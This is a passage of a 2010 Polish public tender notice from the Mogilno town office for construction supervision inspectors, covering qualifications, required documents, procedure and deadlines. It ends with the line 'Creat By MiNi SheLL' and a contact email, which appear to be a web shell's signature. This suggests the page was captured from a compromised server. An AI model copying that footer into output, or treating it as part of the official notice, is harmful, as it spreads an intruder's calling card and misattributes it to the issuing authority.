budownictwie - do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń; Doświadczenie zawodowe w pełnieniu funkcji kierownika budowy, lub inspektora nadzoru inwestorskiego w zakresie robót instalacyjnych w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych, lub kierownika robót w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, , wodociągowych i kanalizacyjnych, co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
E) INSPEKTOR NADZORU BRANŻY DROGOWEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej, oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa,  doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową związane z budową dróg lub odbudową nawierzchni drogowych. 
Możliwość przedstawienia pisemnych zobowiązań innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia dotyczy jedynie warunków udziału w postępowaniu, o których mowa w pkt. 7.2.1 ppkt 2).
Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i ust. 2 pkt. 1-3 ustawy Prawo zamówień publicznych, co jest równoznaczne z nie spełnianiem przesłanek do wykluczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia i weryfikacji przez Zamawiającego spełniania warunku udziału w postępowaniu, w zakresie znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W tym celu należy dołączyć do oferty:
a)	opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument
potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 200.000,- PLN (słownie: dwieście tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Załączeniem  dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - Załącznik nr 4 do SIWZ - Wykaz wykonanych usług.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin zakończenia realizacji przedmiotu wykonania zamówienia może ulec zmianie w przypadku gdy ulegnie zmianie termin realizacji robót objętych nadzorem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mogilno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mogilnie,
ul.Narutowicza 1
88-300 Mogilno,
pokój nr 212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 10:00, miejsce: Urząd Miejski w Mogilnie,
ul.Narutowicza 1
88-300 Mogilno,
pokój nr 106 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com